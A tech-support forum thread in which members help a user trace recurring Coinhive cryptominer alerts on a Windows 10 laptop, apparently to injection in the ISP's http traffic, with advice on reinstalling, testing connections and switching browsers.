> It seems like a temporary internet webpage file created (& probably active only) inside a browser while being connected to the net. If the system is not connected to the net then it should show no threat. Also, this file can be created by simply visiting some affected website. Delete everything inside the temp folder where this file is located, then connect to the net & browse some sites you usually visit using the browsers you generally use while letting Avira Free run in the background. If you get no warning then everything is fine. From next time onwards, whenever you visit a site infected with such malware, Avira will block it, giving you a similar warning "coinhive.js.. detected & quarantined".


did what you said...surfing is normal..no warnings..including while installing google chrome finally...so far looks good...am running avira, malwarebytes and zemana all free versions and all are CLEAR so far...fingers crossed for some time...wondering whether to use net banking or not..or wait for a day...in the meanwhile updating windows


----------



## whitestar_999 (Nov 2, 2019)

Which windows version are you using btw(win 8.1/win 10 home/win 10 pro etc)? Wait for windows to update first.


----------



## andy_65_in (Nov 2, 2019)

whitestar_999 said:


> Which windows version are you using btw(win 8.1/win 10 home/win 10 pro etc)? Wait for windows to update first.


Win 10..64 bit.  Home


----------



## andy_65_in (Nov 3, 2019)

Getting pua cryptominer gen alerts in my avira free every minute as i use mozilla(i removed chrome)...this crap then goes into quarantine where i delete it..is this malware...btw scans by hitmanpro, zemana, malwarebytes, windows defender show no threats....what should i do...stick to IE only


----------



## pkkumarcool (Nov 3, 2019)

andy_65_in said:


> Getting pua cryptominer gen alerts in my avira free every minute as i use mozilla(i removed chrome)...this crap then goes into quarantine where i delete it..is this malware...btw scans by hitmanpro, zemana, malwarebytes, windows defender show no threats....what should i do...stick to IE only



Have you fresh installed windows?


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 3, 2019)

pkkumarcool said:


> Have you fresh installed windows?
> 
> 
> Sent from my iPhone using Tapatalk


Yes


----------



## pkkumarcool (Nov 3, 2019)

andy_65_in said:


> Yes



How did you get the virus again then?


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 3, 2019)

Getting repeated attacks every minute while browsing...


----------



## andy_65_in (Nov 3, 2019)

Brother, should i remove avira....for peace of mind...lol


----------



## pkkumarcool (Nov 3, 2019)

andy_65_in said:


> Brother, should i remove avira....for peace of mind...lol



Use avast 


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 3, 2019)

Trojan coin hive is back....as per win defender....dont know what the hell is wrong with my machine...best is to reformat it again and sell it...its already 7 years old


----------



## andy_65_in (Nov 3, 2019)

Trojan hive also confirmed by newly added avast...will reformat and try selling this pc...im surprised the hdd looks compromised even after reformat....avast prompts to buy paid version


----------



## meetdilip (Nov 3, 2019)

Did you use an existing installer of Chrome or Firefox? That could be the compromised part.

Do a clean wipe of the HDD, download the latest Windows 10 ISO and do an install. Then download all installers afresh, whether Chrome, Firefox, MS Office etc.

I know this is a lot of work. But I don't see any other way of being certain.


----------



## whitestar_999 (Nov 3, 2019)

Seems like you are installing something infected (I hope you are not using firefox/chrome setup files from earlier/backup instead of downloading fresh again from their official sites).


----------



## meetdilip (Nov 3, 2019)

Another possibility is that it is coming from your network. It can come even from an infected phone if not an infected PC.


----------



## whitestar_999 (Nov 3, 2019)

meetdilip said:


> Another possibility is that it is coming from your network. It can come even from an infected phone if not an infected PC.


That is only possible if network is properly setup & write permission given to shared folders.


----------



## andy_65_in (Nov 3, 2019)

Firefox etc downloaded fresh....no old files....avast now not permitting to access every site....


----------



## andy_65_in (Nov 3, 2019)

Avast free removed 2 viruses trojan types...i am using oem website for browsers download....avast paid available for 700.00 wondering using it...even got a vpn secure on trial from avast..which as per them shows my location in hongkong!!will strengthening the wi fi password matter...at 700 avast for 1pc 1 yr is ok


----------



## whitestar_999 (Nov 3, 2019)

oem website? you mean these: Download the fastest Firefox ever  Google Chrome Web Browser


----------



## pkkumarcool (Nov 3, 2019)

andy_65_in said:


> Avast free removed 2 viruses trojan types...i am using oem website for browsers download....avast paid available for 700.00 wondering using it...even got a vpn secure on trial from avast..which as per them shows my location in hongkong!!will strengthening the wi fi password matter...at 700 avast for 1pc 1 yr is ok



So are you still getting pop ups?



Sent from my iPad using Tapatalk


----------



## meetdilip (Nov 3, 2019)

Avast has a boot time scan option. Give it a try.


----------



## andy_65_in (Nov 3, 2019)

Js.miner-av is the virus blocked by the free avast..but its screwing my happiness..i cant access most sites now...used roguekiller also...that crap showed no virus...lol...dont know what to do....should i reformat this lappie again...please advise


----------



## andy_65_in (Nov 4, 2019)

Even ran full scan of defender and ms malware removal tool...no threats...but when i surf..avast starts fingering with js miner threat


----------



## whitestar_999 (Nov 4, 2019)

andy_65_in said:


> Even ran full scan of defender and ms malware removal tool...no threats...but when i surf..avast starts fingering with js miner threat


Can you post a screenshot of the web page when you get the warning? Also can you check with different connection(some mobile 3g/4g connection hotspot).


----------



## andy_65_in (Nov 4, 2019)

Cant upload...using mobile...heres what i get...THREAT BLOCKED..we safely aborted connection on ncc.avast.com because it was infected with JS miner AV(Tr)...etc etc

Will check 4 g tomorrow as it doesnt work here...but im using my mobile on same network...no probs


----------



## andy_65_in (Nov 4, 2019)

The same nonsense has started as was with kaspersky....every website being blocked

Please advise...if i again format this crap machine...how should i start after that...that can be my last try...otherwise i trash this crap


----------



## whitestar_999 (Nov 4, 2019)

Wait to check with another 4G/mobile connection. There is a chance that your net connection itself is compromised (e.g. if you are using the net on the PC via mobile & the mobile itself is infected with some Android malware which inserts itself into every web page you visit from the PC), or that your net provider's network is infected (possible if it is some small cable-operator type connection & not one of the big ones like Airtel etc.) & every web page you visit is getting infected at your net provider's end, as traffic has to pass through there.


----------



## andy_65_in (Nov 4, 2019)

whitestar_999 said:


> Wait to check with another 4G/mobile connection. There is a chance that your net connection itself is compromised (e.g. if you are using the net on the PC via mobile & the mobile itself is infected with some Android malware which inserts itself into every web page you visit from the PC), or that your net provider's network is infected (possible if it is some small cable-operator type connection & not one of the big ones like Airtel etc.) & every web page you visit is getting infected at your net provider's end, as traffic has to pass through there.



I dont think the net connection is compromised.im using both my mobiles on it..they work..infact right now my pc is also typing this reply!!!but mostly surfing on this pc gets fingered by avast...windows update is blocked....downloaded spyhunter 5..but the damn avast didnt permit its installation...lol...confusion on the rise..btw secure websites are accessible like sbi online etc...should i get the paid avast version right now????


----------



## andy_65_in (Nov 4, 2019)

If 4 g also fails...then it means the pc is infected?


----------



## whitestar_999 (Nov 4, 2019)

andy_65_in said:


> I dont think the net connection is compromised.im using both my mobiles on it..they work..infact right now my pc is also typing this reply!!!but mostly surfing on this pc gets fingered by avast...windows update is blocked....downloaded spyhunter 5..but the damn avast didnt permit its installation...lol...confusion on the rise..btw secure websites are accessible like sbi online etc...should i get the paid avast version right now????


Don't be so sure. Mobiles will work fine because mining trojans are designed for windows & not android. Secure websites are called "secured" because the data connection made over a secured website connection cannot be intercepted & modified else web page will fail to load saying connection error. To me it seems that your data leaving the pc is getting modified & infected which is why no matter what you do nothing will work(incl buying any av paid version). Wait to test with a different connection(4g/3g/2g,doesn't matter as long as it is a different net connection provider than the one you are currently using).


----------



## cute.bandar (Nov 5, 2019)

Are you using wifi for your PC ? or connecting through mobile 4g with usb cable ?

If wifi, then it's possible your router is compromised. To check, disconnect wifi, connect with mobile, clear DNS on Windows, restart the browser, then try. Also, if you have other devices on the same wifi network, try to open on mobile the same websites that are being blocked on desktop.
You can also try running "ping blockedwebsite.com" in cmd in Windows.

Another thing to try: make a bootable linux usb drive. boot from it and open those blocked websites.

Post exact information, filenames etc of the malware, popups, websites blocked. Uninstall the antivirus if you have to, to find this. No use buying avast paid.


----------



## sling-shot (Nov 5, 2019)

meetdilip said:


> Avast has a boot time scan option. Give it a try.


Do this first.


----------



## whitestar_999 (Nov 5, 2019)

cute.bandar said:


> Are you using wifi for your PC ? or connecting through mobile 4g with usb cable ?
> 
> If wifi, then it's possible your router is compromised. To check, disconnect wifi, connect with mobile, clear DNS on Windows, restart the browser, then try. Also, if you have other devices on the same wifi network, try to open on mobile the same websites that are being blocked on desktop.
> You can also try running "ping blockedwebsite.com" in cmd in Windows.
> ...


Malware seems to be crypto miners which embed themselves into the browser, so it probably won't show up on mobiles, as the main purpose of crypto miners is to use the infected system's processor for mining crypto currency & mobile phone processors are not powerful enough (at least most of them compared to desktop/laptop processors). As for bootable linux versions, again I am not sure if the same miner can work inside linux browser versions. Best way to check would be another laptop with windows installed.


----------



## Desmond (Nov 5, 2019)

I think the best option is to format your PC and reinstall your OS. No point wasting too much energy in disinfecting your PC which is time consuming and itself not guaranteed to be perfect.


----------



## meetdilip (Nov 5, 2019)

Looks like his modem has a hijacked DNS. Otherwise, something on the network is the culprit.


----------



## Desmond (Nov 5, 2019)

meetdilip said:


> Looks like his modem has a hijacked DNS. Otherwise, something on the network is the culprit.


Wouldn't a factory reset fix this? In a worst case, perhaps flash a new ROM?


----------



## meetdilip (Nov 5, 2019)

Both should work.


----------



## andy_65_in (Nov 5, 2019)

Desmond David said:


> I think the best option is to format your PC and reinstall your OS. No point wasting too much energy in disinfecting your PC which is time consuming and itself not guaranteed to be perfect.


I can do that again...but...im using a paid wi fi network which is being used in the entire cantt where i am....i mean  many users...so i cant change the bloody net...but advise me what to do after i re format my pc since i will use the same network....


----------



## andy_65_in (Nov 5, 2019)

Desmond David said:


> Wouldn't a factory reset fix this? In a worst case, perhaps flash a new ROM?


I did the complete formatting once....took me 6 hours...can do that again....but after that what should i do...ill revert to win 10 only...update the pc?? and carry on with win defender only???


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> I can do that again...but...im using a paid wi fi network which is being used in the entire cantt where i am....i mean  many users...so i cant change the bloody net...but advise me what to do after i re format my pc since i will use the same network....



Did you put the backup files back on the HDD after the clean install? Better not to; I think the virus is coming from such files. When you put them back they infect the Windows files.


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 5, 2019)

pkkumarcool said:


> Did you put the backup files back on the HDD after the clean install? Better not to; I think the virus is coming from such files. When you put them back they infect the Windows files.
> 
> 
> Sent from my iPhone using Tapatalk


I didnt use any physical device...used gdrive to backup


----------



## andy_65_in (Nov 5, 2019)

As i start win update again...the avast flashes it aborted update because of js miner av...so im stuck....the damn thing has now started flashing continuously...this avast warns me to update....should i do it...i feel i re format this pc...then see the next move


----------



## andy_65_in (Nov 5, 2019)

Started the formatting again....


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> I didnt use any physical device...used gdrive to backup



Gdrive files could be affected too.


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 5, 2019)

pkkumarcool said:


> Gdrive files could be affected too.
> 
> 
> Sent from my iPhone using Tapatalk


This is crazy...are you sure


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> This is crazy...are you sure



Yes, I don't think gdrive checks for infected software before uploading.


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 5, 2019)

Ok...now reformat started....what should i do after it completes..merely update windows or


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> Ok...now reformat started....what should i do after it completes..merely update windows or



Don't put back the backup files; just install AV first, then Chrome, and check whether you are still getting the trojan notification.


Sent from my iPhone using Tapatalk


----------



## meetdilip (Nov 5, 2019)

Which Windows ISO are you using? Download the latest from the MS website. Or borrow one. Don't download anything through this network to be installed on the clean PC. Take refuge at some friend's.

Comodo Firewall comes with some module which keeps you safe on public WiFi.


----------



## andy_65_in (Nov 5, 2019)

Ok....


pkkumarcool said:


> Don't put back the backup files; just install AV first, then Chrome, and check whether you are still getting the trojan notification.
> 
> 
> Sent from my iPhone using Tapatalk


ok...perhaps i use a free av...avast again??or what


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> Ok....
> ok...perhaps i use a free av...avast again??or what



Yes but better use paid av later


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 5, 2019)

meetdilip said:


> Which Windows ISO are you using? Download the latest from the MS website. Or borrow one. Don't download anything through this network to be installed on the clean PC. Take refuge at some friend's.
> 
> Comodo Firewall comes with some module which keeps you safe on public WiFi.


I used no ISO....the reformat installed win 10..


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> I used no ISO....the reformat installed win 10..



?


Sent from my iPhone using Tapatalk


----------



## meetdilip (Nov 5, 2019)

andy_65_in said:


> installed win 10..



using ?

1. DVD

2. USB

from which source did you build them ?


----------



## andy_65_in (Nov 5, 2019)

pkkumarcool said:


> ?
> 
> 
> Sent from my iPhone using Tapatalk


I used no ISO....when i started again after the format...i was on win 10..my previous version


----------



## andy_65_in (Nov 5, 2019)

meetdilip said:


> using ?
> 
> 1. DVD
> 
> ...


I have a us made hp..which came to me with win 8...upgraded free to win 10 3 yr ago when ms offered that update free


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> I used no ISO....when i started again after the format...i was on win 10..my previous version



No i mean download fresh win 10 iso from official website then use rufus to make bootable pendrive then install 


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Nov 5, 2019)

Can i do


pkkumarcool said:


> No i mean download fresh win 10 iso from official website then use rufus to make bootable pendrive then install
> 
> 
> Sent from my iPhone using Tapatalk


 Can i do this on the newly formatted pc


----------



## whitestar_999 (Nov 5, 2019)

Download Windows 10

What happened to testing with some other mobile data connection?


----------



## pkkumarcool (Nov 5, 2019)

andy_65_in said:


> Can i do
> 
> Can i do this on the newly formatted pc



How have you been clean installing windows all this time?


Sent from my iPhone using Tapatalk


----------



## meetdilip (Nov 5, 2019)

andy_65_in said:


> I have a us made hp..which came to me with win 8...upgraded free to win 10 3 yr ago when ms offered that update free


So you are just formatting drives ? What about My Documents, Pictures, Videos etc ? How are you getting new Windows 10 each time ?


----------



## SaiyanGoku (Nov 5, 2019)

andy_65_in said:


> Can i do
> 
> Can i do this on the newly formatted pc


You'll still risk infecting that new iso. Do you have a clean, untouched live usb drive you can use to boot from (linux or HBCD)?


----------



## andy_65_in (Nov 5, 2019)

whitestar_999 said:


> Download Windows 10
> 
> What happened to testing with some other mobile data connection?


I tried....the mobilec


meetdilip said:


> So you are just formatting drives ? What about My Documents, Pictures, Videos etc ? How are you getting new Windows 10 each time ?


After formatting the whole pc ...is the iso file required to fully get win 10....if so....i will have to use a clean pendrive? and copy in that the iso image??


----------



## SaiyanGoku (Nov 5, 2019)

andy_65_in said:


> I tried....the mobilec
> 
> After formatting the whole pc ...is the iso file required to fully get win 10....if so....i will have to use a clean pendrive? and copy in that the iso image??


DO NOT use your infected pc to download the iso or create a bootable usb drive.


----------



## andy_65_in (Nov 5, 2019)

SaiyanGoku said:


> DO NOT use your infected pc to download the iso or create a bootable usb drive.


Ok..ill use a different pc to download the iso tool and then the iso file in a separate pendrive...then i use this pendrive to install win 10 on my affected pc...is this correct


----------



## TheSloth (Nov 5, 2019)

andy_65_in said:


> Ok..ill use a different pc to download the iso tool and then the iso file in a separate pendrive...then i use this pendrive to install win 10 on my affected pc...is this correct


Yes.
1. Get the bootable USB stick ready with a friend's PC.
2. Then plug the USB into the laptop and turn on the laptop.
3. Press F2 or Del key to get into BIOS and change the settings to boot from USB.
4. Choose "Save the settings and exit from BIOS".
5. Your laptop will reboot and go to the Win 10 installer on USB.
6. Select Clean install and wipe the entire HDD because you have already taken a backup.
7. After installation, download ESET and set it up. Then restore the Google Drive backup in small parts and scan.


----------



## whitestar_999 (Nov 5, 2019)

andy_65_in said:


> I tried....the mobilec


And what was the result? Do you still get warnings on browsing?


----------



## andy_65_in (Nov 5, 2019)

whitestar_999 said:


> And what was the result? Do you still get warnings on browsing?


Today the 4g was erratic....will try after iso update..wondering should i get back my kis...i still know its key...had removed it


----------



## whitestar_999 (Nov 5, 2019)

Your choice, KIS is as good as Avast.


----------



## andy_65_in (Nov 5, 2019)

Can a dvd be used to do the work of a usb.....there are issues with usbs in govt offices


----------



## sling-shot (Nov 5, 2019)

Possible but it will be too slow. Also I am not sure if the space is enough.


----------



## whitestar_999 (Nov 5, 2019)

andy_65_in said:


> Can a dvd be used to do the work of a usb.....there are issues with usbs in govt offices


You can but it is a bit technical & involves running some tool/script which I think may also have issue in govt offices.


----------



## andy_65_in (Nov 9, 2019)

Is there any way of installing win 10 in my affected/ fully formatted pc directly from the net  without iso file etc


----------



## Desmond (Nov 9, 2019)

No.

What problem are you facing in making a bootable windows 10 USB? It's as simple as downloading the media creator tool and making a bootable USB using it. You should do this on another PC though.

Sent from my GM1911 using Tapatalk


----------



## SaiyanGoku (Nov 9, 2019)

andy_65_in said:


> Is there any way of installing win 10 in my affected/ fully formatted pc directly from the net  without iso file etc


I think you would need someone to do a network install on your laptop, which is common in an enterprise scenario. I don't think there is another way to do that.


----------



## meetdilip (Nov 9, 2019)

A very simple solution for you. Take it to the nearest laptop repair, tell the problem, ask them if they can fix it. If they say ok, leave it with them, collect it once fixed. All you have to do is shell out some money.


----------



## SaiyanGoku (Nov 9, 2019)

meetdilip said:


> A very simple solution for you. Take it to the nearest laptop repair, tell the problem, ask them if they can fix it. If they say ok, leave it with them, collect it once fixed. All you have to do is shell out some money.


Yeah, wait till they install some old version of windows which they didn't download from microsoft directly and who knows what other bloatware they'll install.


----------



## pkkumarcool (Nov 9, 2019)

SaiyanGoku said:


> Yeah, wait till they install some old version of windows which they didn't download from microsoft directly and who knows what other bloatware they'll install.






Sent from my iPhone using Tapatalk


----------



## meetdilip (Nov 9, 2019)

There are many people other than us who know how to do their work. Most PC repair guys would know how to fix this.


----------



## sling-shot (Nov 9, 2019)

SaiyanGoku said:


> Yeah, wait till they install some old version of windows which they didn't download from microsoft directly and who knows what other bloatware they'll install.


Just saw a pristine RTM copy of Windows 10 installed after wiping a factory installation in another guy's laptop last week!


----------



## SaiyanGoku (Nov 9, 2019)

sling-shot said:


> Just saw a pristine RTM copy of Windows 10 installed after wiping a factory installation in another guy's laptop last week!


Most of the local repair shops do not bother with downloading latest version. Some are lazy enough to install cracked Windows 10 1703 build (in 2019) Home Single Language 32 bit on a laptop with 8GB ram 
The only place to get an untouched iso is from the OEM or Microsoft directly.


----------



## whitestar_999 (Nov 9, 2019)

meetdilip said:


> There are many people other than us who know how to do their work. Most PC repair guys would know how to fix this.


The issue is to find out "these right people" instead of "any pc repair guy".


----------



## meetdilip (Nov 9, 2019)

If I saw the other threads correctly, OP is at a point where he is about to buy a new laptop. It is much easier to get it repaired through a reputed service centre.


----------



## andy_65_in (Nov 10, 2019)

Thankful to whitestar who took the effort to connect with my pc( anydesk) and identify the coin hive issue..its still there...the IE directs me to coinhive ...which can be noted in the network mode when IE used in private browsing....surprisingly this coinhive not visible in networking when i use 4 g network...im otherwise using an unlimited paid broadband connection....???


----------



## andy_65_in (Nov 12, 2019)

see attached files for the coinhive behaviour both in http and https protocol as pointed out by whitestar..also enclosed is screenshot of the coinhive warning in windows defender


----------



## whitestar_999 (Nov 12, 2019)

Any updates on your net provider reply?


----------



## andy_65_in (Nov 14, 2019)

whitestar_999 said:


> Any updates on your net provider reply?


nothing..hes clear theres nothing wrong with his network..apparently nobody else using it complaining


----------



## andy_65_in (Nov 14, 2019)

sorry for uploading an off topic reply but from the attached file can my pc's battery life be predicted..the hp battery check tool recommends replacement which i want to avoid in such an old computer..


----------



## whitestar_999 (Nov 14, 2019)

andy_65_in said:


> nothing..hes clear theres nothing wrong with his network..apparently nobody else using it complaining


Nobody will complain if they don't look for it. The only option remaining now is to do this same test on some friend's/relative's PC in their house using the same net provider connection in your area.



andy_65_in said:


> sorry for uploading an off topic reply but from the attached file can my pc's battery life be predicted..the hp battery check tool recommends replacement which i want to avoid in such an old computer..


As long as the laptop battery can give a backup of 45 min, it is fine. With time & usage every laptop battery's capacity goes down & it depends on you when to replace it (e.g. if you are happy with even a 30 min backup then you can replace it later compared to someone who is not happy with even a 40 min backup because he wants at least 1 hour backup).


----------



## SaiyanGoku (Nov 14, 2019)

andy_65_in said:


> the hp battery check tool recommends replacement which i want to avoid in such an old computer..


If you are not able to find it from official service center, you'll have to look for 3rd party "compatible" batteries from ebay or local shops.


----------



## andy_65_in (Nov 14, 2019)

thanks both Saiyan and whitestar for the advice..please tell me..with the laptop running ok so far on Defender and the free Malwarebytes should I

1. install a paid antivirus(which may then start fingering my browsing because of coinhive..my guess).

2. download all my stored data in googledrive back onto my lappie(if its clear after a virus scan)


----------



## SaiyanGoku (Nov 14, 2019)

Have you tried this?:
Remove CoinHive In-Browser Miner


----------



## whitestar_999 (Nov 14, 2019)

SaiyanGoku said:


> Have you tried this?:
> Remove CoinHive In-Browser Miner


I checked his PC via a remote session. The thing is that I can see coinhive entries being loaded into any http webpage & the source of these entries is not some server but rather cache. I had already cleaned the browser cache earlier, so it could only mean that cache here refers to his ISP network server, because I tried the same with his laptop connected via a 4G mobile network & it didn't happen. Also, https sites are unaffected by this because https traffic cannot be intercepted & modified during transit. All this led me to believe that his ISP network itself is infected & any http traffic passing through is being intercepted to load these coinhive entries from the ISP server cache.

P.S. check the attached pdf proof above


----------
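The comparison whitestar_999 describes above (the same http page loaded over the ISP line and over the 4G connection) can be automated by diffing the script tags of the two copies. This is an added example, not code from the thread; the page URL, both HTML samples, the `coinhive.example` host and the keyword list are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed samples: the same http page fetched over two network paths.
PAGE_URL = "http://news.example/index.html"
VIA_MOBILE = """<html><head>
<script src="/static/app.js"></script>
</head><body><p>Headlines</p></body></html>"""
VIA_ISP = """<html><head>
<script src="/static/app.js"></script>
<script src="https://coinhive.example/lib/miner.min.js"></script>
<script>/* constructed stand-in for an injected loader */ startCoinhiveMiner();</script>
</head><body><p>Headlines</p></body></html>"""
MINER_HINTS = ("coinhive", "cryptonight")  # assumed keyword list

class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies of a page."""
    def __init__(self, base_url):
        super().__init__()
        self.base_url, self.found, self._inline = base_url, set(), False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:  # resolve relative URLs so both copies compare equal
                self.found.add(("external", urljoin(self.base_url, src)))
            self._inline = not src

    def handle_data(self, data):
        if self._inline and data.strip():
            self.found.add(("inline", data.strip()))

    def handle_endtag(self, tag):
        if tag == "script":
            self._inline = False

def collect(html, base_url):
    parser = ScriptCollector(base_url)
    parser.feed(html)
    return parser.found

def injected_scripts(trusted_html, suspect_html, base_url):
    """Scripts only in the suspect copy, as (kind, value, miner_flag)."""
    extra = collect(suspect_html, base_url) - collect(trusted_html, base_url)
    return [(kind, value, any(h in value.lower() for h in MINER_HINTS))
            for kind, value in sorted(extra)]

if __name__ == "__main__":
    for finding in injected_scripts(VIA_MOBILE, VIA_ISP, PAGE_URL):
        print(finding)
```

Any script that appears only in the copy fetched over the suspect path is worth reporting to the ISP even when it matches no keyword, since the trusted copy shows what the site actually serves.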



## SaiyanGoku (Nov 14, 2019)

whitestar_999 said:


> I checked his pc via remote session. The thing is that I can see coinhive entries being loaded into any http webpage & source of these entries is not some server but rather cache. I already cleaned browser cache earlier so it could only mean that cache here refers to his ISP network server because I tried the same with his laptop connected via 4g mobile network & it didn't happen. Also https sites too are unaffected by this because https traffic cannot be intercepted & modified during transit. All this led me to believe that his ISP network itself is infected & any http traffic passing through is being intercepted to load these coinhive entries from ISP server cache.
> 
> P.S. check the attached pdf proof above


Can't check the pdf in office.
Would setting dns to 1.1.1.1, 8.8.8.8 and using https everywhere, ublock origin extensions combined with Brave Browser (Secure, Fast & Private Web Browser with Adblocker | Brave Browser) or Opera with VPN connected help in this situation?


----------



## andy_65_in (Nov 14, 2019)

coinhive is back...lol


----------



## andy_65_in (Nov 14, 2019)

SaiyanGoku said:


> Can't check the pdf in office.
> Would setting dns to 1.1.1.1, 8.8.8.8 and using https everywhere, ublock origin extensions combined with Brave Browser (Secure, Fast & Private Web Browser with Adblocker | Brave Browser) or Opera with VPN connected help in this situation?


bravebrowser install checked by firewall..cant say where


----------



## SaiyanGoku (Nov 14, 2019)

andy_65_in said:


> coinhive is back...lol


Setup log? Something is trying to install another program? 

Could you check startup options and scheduled tasks and try to remove suspicious one by booting into safe mode? (take caution though)


----------



## whitestar_999 (Nov 14, 2019)

SaiyanGoku said:


> Can't check the pdf in office.
> Would setting dns to 1.1.1.1, 8.8.8.8 and using https everywhere, ublock origin extensions combined with Brave Browser (Secure, Fast & Private Web Browser with Adblocker | Brave Browser) or Opera with VPN connected help in this situation?


Already set dns to 8.8.8.8 in his router settings & https everywhere will not work everywhere as not all sites have a https version(even https pages have some http content). I also tried a proxy(non-https) site to open google with same result.


----------



## whitestar_999 (Nov 14, 2019)

@Desmond David @Nerevarine can you check the pdf attachments on previous page as I am not much familiar with how ISP server cache can affect http page loading.


----------



## Desmond (Nov 14, 2019)

I am currently at work. Can check after I get home.

Sent from my GM1911 using Tapatalk


----------



## sling-shot (Nov 14, 2019)

Have you reset your router? 
Coinhive ...still - Virus, Trojan, Spyware, and Malware Removal Help


----------



## andy_65_in (Nov 15, 2019)

sling-shot said:


> Have you reset your router?
> Coinhive ...still - Virus, Trojan, Spyware, and Malware Removal Help


yes


----------



## SaiyanGoku (Nov 16, 2019)

SaiyanGoku said:


> Can't check the pdf in office.
> Would setting dns to 1.1.1.1, 8.8.8.8 and using https everywhere, ublock origin extensions combined with Brave Browser (Secure, Fast & Private Web Browser with Adblocker | Brave Browser) or Opera with VPN connected help in this situation?


I've switched over to brave completely and it doesn't require extra adblockers.


----------



## whitestar_999 (Nov 16, 2019)

SaiyanGoku said:


> I've switched over to brave completely and it doesn't require extra adblockers.


Even Brave browser would be affected if your ISP server cache itself is modifying http traffic.


----------



## SaiyanGoku (Nov 16, 2019)

whitestar_999 said:


> Even Brave browser would be affected if your ISP server cache itself is modifying http traffic.


Yes but there is inbuilt toggle to force https which is enabled by default. Might help him and there is no harm in trying.


----------



## bssunilreddy (Nov 16, 2019)

SaiyanGoku said:


> I've switched over to brave completely and it doesn't require extra adblockers.


Brave is a browser?
Does it have sign in like chrome?
I want to be signed into google

Sent from my Nokia 8.1 using Tapatalk


----------



## SaiyanGoku (Nov 16, 2019)

bssunilreddy said:


> Brave is a browser?
> Does it have sign in like chrome?
> I want to be signed into google
> 
> Sent from my Nokia 8.1 using Tapatalk


Yes it is a chromium based browser. It is privacy focused so doesn't allow sign in like Chrome IIRC
How can i log in in Brave browser?


> There is no login feature for Brave and there won't be one in future as well. For bookmarks we are implementing Sync which works with other Brave browsers on desktop/iOS/Android. In future iterations sync would also support history and site settings and possibly passwords. But at no point will you ever have to login to use any of these features.
> 
> Hope this helps. The Google features you mentioned are not going to be part of Brave as the application model is very different.


----------



## whitestar_999 (Nov 16, 2019)

SaiyanGoku said:


> Yes but there is inbuilt toggle to force https which is enabled by default. Might help him and there is no harm in trying.


The problem is that not all sites have https version & btw that injected coinhive entry is also using https ironically.


----------



## andy_65_in (Nov 16, 2019)

successfully installed bravebrowser..there wasn't any interference this time....using it..hoping coinhive will not bother now


----------



## andy_65_in (Nov 24, 2019)

brave browser working fine..seamless surfing..no coinhive so far


----------



## whitestar_999 (Nov 24, 2019)

andy_65_in said:


> brave browser working fine..seamless surfing..no coinhive so far


Can you do the same test as before & check the entries loading at the time of page loading (menu--view--toggle developer tools, look for something like network tab)?


----------



## andy_65_in (Nov 25, 2019)

whitestar_999 said:


> Can you do the same test as before & check the entries loading at the time of page loading (menu--view--toggle developer tools, look for something like network tab)?


brave browser doesnt permit copy of the network contents unlike google...no screenshot also


----------



## whitestar_999 (Nov 25, 2019)

andy_65_in said:


> brave browser doesnt permit copy of the network contents unlike google...no screenshot also


prt scr/print screen key should still work.


----------



## pkkumarcool (Nov 27, 2019)

andy_65_in said:


> brave browser working fine..seamless surfing..no coinhive so far



Check installing chrome again.


Sent from my iPhone using Tapatalk


----------



## andy_65_in (Dec 13, 2019)

any risks in using brave browser with scripts block mode disabled...thats required as i cant access gmail,facebook


----------



## SaiyanGoku (Dec 13, 2019)

andy_65_in said:


> any risks in using brave browser with scripts block mode disabled...thats required as i cant access gmail,facebook


I'm using it with Brave shield enabled without any issues for Gmail.


----------



## andy_65_in (Dec 13, 2019)

SaiyanGoku said:


> I'm using it with Brave shield enabled without any issues for Gmail.


I had issues with facebook and gmail...javascript not enabled....hows that to be done.....so both wont open


----------

